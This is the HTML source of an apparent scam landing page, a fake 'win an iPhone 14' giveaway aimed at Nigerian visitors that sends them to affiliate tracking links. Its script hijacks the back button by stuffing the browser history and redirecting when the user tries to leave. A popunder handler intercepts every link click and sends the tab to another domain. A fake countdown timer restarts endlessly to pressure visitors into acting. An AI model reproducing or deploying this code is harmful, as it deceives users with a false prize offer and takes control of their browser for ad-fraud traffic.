<!DOCTYPE html>
<html lang="en">
<head>
    <meta name="viewport" content="initial-scale=1,maximum-scale=1,user-scalable=no">
    <title>Get an iPhone 14 Today</title>
    <link rel="icon" href="images/favicon.png">
    <style>
        .container {
            text-align: center;
            font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
            display: block;
            max-width: 300px;
            margin: auto;
        }
        .timer {
            color: red;
            font-weight: 700;
            font-size: 150%;
            margin: 10px;
        }
        p {
            font-size: 18px;
            margin: 10px;
        }
        .bold {
            font-weight: 700;
        }
        img {
            max-width: 250px;
            padding: 8px;
        }
        .flag {
            width: 100px;
            margin: 10px auto;
        }
        .button {
            background-color: green;
            color: #fff;
            padding: 18px;
            border-radius: 10px;
            max-width: 80%;
            margin: auto;
            font-size: 125%;
        }
        h1 {
            margin-bottom: 5px;
            margin-top: 5%;
            font-size: 25px;
        }
        .container {
            background-color: white;
            padding: 15px;
            border-radius: 5px;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Fill out the quick form and get the chance to win an iPhone 14 today!</h1>
        <img src="https://upload.wikimedia.org/wikipedia/commons/7/79/Flag_of_Nigeria.svg" alt="Nigerian Flag" class="flag">
        <a href="" target="_blank">
            <img src="iphone.png">
        </a>
        <p>Tired of using Android?</p>
        <p>Click start and participate now!</p>
        <p class="bold">OFFER IS VALID ONLY FOR:</p>
        <p class="timer" id="timer">01:59</p><br>
        <a href="https://t2.surpriseanddelightgifts.com/click" style="margin:35px;background-color:#008000;color:white;padding:15px;border-radius:5px;font-size:25px;"><b>START</b></a>
        <p></p>
    </div>

    <script type="text/javascript">
        // BBR (Back Button Redirection)
        var back_ntb_link = 'https://app.impih.com/?utm_medium=a049de707e16aec53009ccb6d1f483b5325a5931&utm_campaign=ng_smartlink_20240522&1=BBR';
        if (typeof back_ntb_link !== 'undefined' && back_ntb_link !== null) {
            !(function() {
                var t;
                try {
                    const URL = window.location.href.split(/[#]/)[0];
                    for (t = 0; 10 > t; ++t) history.pushState({}, '', URL + '#');
                    onpopstate = function(event) {
                        event.state && location.replace(back_ntb_link);
                    };
                } catch (o) {
                    console.log(o);
                }
            })();
        }

        // Popunder
        var __under__ = "https://ngsub.surpriseanddelightgifts.com";
        document.addEventListener("click", function(event) {
            var target = event.target;
            while (target) {
                if (target.tagName === "A") {
                    const linkHref = target.href;
                    event.preventDefault();
                    window.open(linkHref, "_blank");
                    window.location.replace(__under__);
                    break;
                }
                target = target.parentNode;
            }
        });

        // Countdown Timer
        function startTimer(duration, display) {
            var timer = duration, minutes, seconds;
            setInterval(function () {
                minutes = parseInt(timer / 60, 10);
                seconds = parseInt(timer % 60, 10);

                minutes = minutes < 10 ? "0" + minutes : minutes;
                seconds = seconds < 10 ? "0" + seconds : seconds;

                display.textContent = minutes + ":" + seconds;

                if (--timer < 0) {
                    timer = duration;
                }
            }, 1000);
        }

        window.onload = function () {
            var duration = 60 * 1 + 59; // 1 minute and 59 seconds
            var display = document.querySelector('#timer');
            startTimer(duration, display);
        };
    </script>
</body>
</html>
